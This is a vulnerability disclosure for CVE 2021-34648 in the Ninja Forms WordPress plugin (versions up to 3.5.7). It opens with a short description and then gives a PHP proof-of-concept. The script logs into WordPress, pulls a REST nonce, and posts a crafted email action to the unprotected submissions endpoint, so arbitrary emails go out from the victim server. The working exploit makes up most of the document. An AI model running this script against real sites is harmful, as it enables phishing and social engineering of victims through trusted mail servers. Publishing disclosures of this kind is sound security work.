Ninja Forms < 3.5.8 – Unprotected REST-API to Email Injection | CVE 2021-34648

Description

The plugin is vulnerable to arbitrary email sending via the trigger_email_action function found in the ~/includes/Routes/Submissions.php file, in versions up to and including 3.5.7. This allows authenticated attackers to send arbitrary emails from the affected server via the /ninja-forms-submissions/email-action REST API which can be used to socially engineer victims.

Proof of Concept

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$proxy = '127.0.0.1:8081';

$postdata = '{"submission":"1","action_settings":{"title":"","key":"","type":"email","active":"1","created_at":"2016-08-24 16:39:20","label":"Please verify your details","to":"{field:email}","subject":"This is an email action.","message":"Hello, Ninja Forms!","objectType":"Action","objectDomain":"actions","editActive":"","conditions":{"collapsed":"","process":"1","connector":"all","when":[],"then":[{"key":"","trigger":"","value":"","type":"field","modelType":"then"}],"else":[]},"payment_gateways":"","payment_total":"","tag":"","email_subject":"Evil Email here! So much you can do, huh?","email_message":"<p>{all_fields_table}<br></p>","from_name":"","from_address":"","reply_to":"","email_format":"html","cc":"","bcc":"","attach_csv":"","email_message_plain":"","parent_id":"2","value":"6"},"formID":0}';

// 1) Log in as contributor+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Rest API Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

//Rest API Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];

//Create New Post
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-json/ninja-forms-submissions/email-action');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_PROXY, $proxy );
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt( $ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json',
    "X-WP-Nonce: $restnonce",
    "Content-Length: $length"));
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>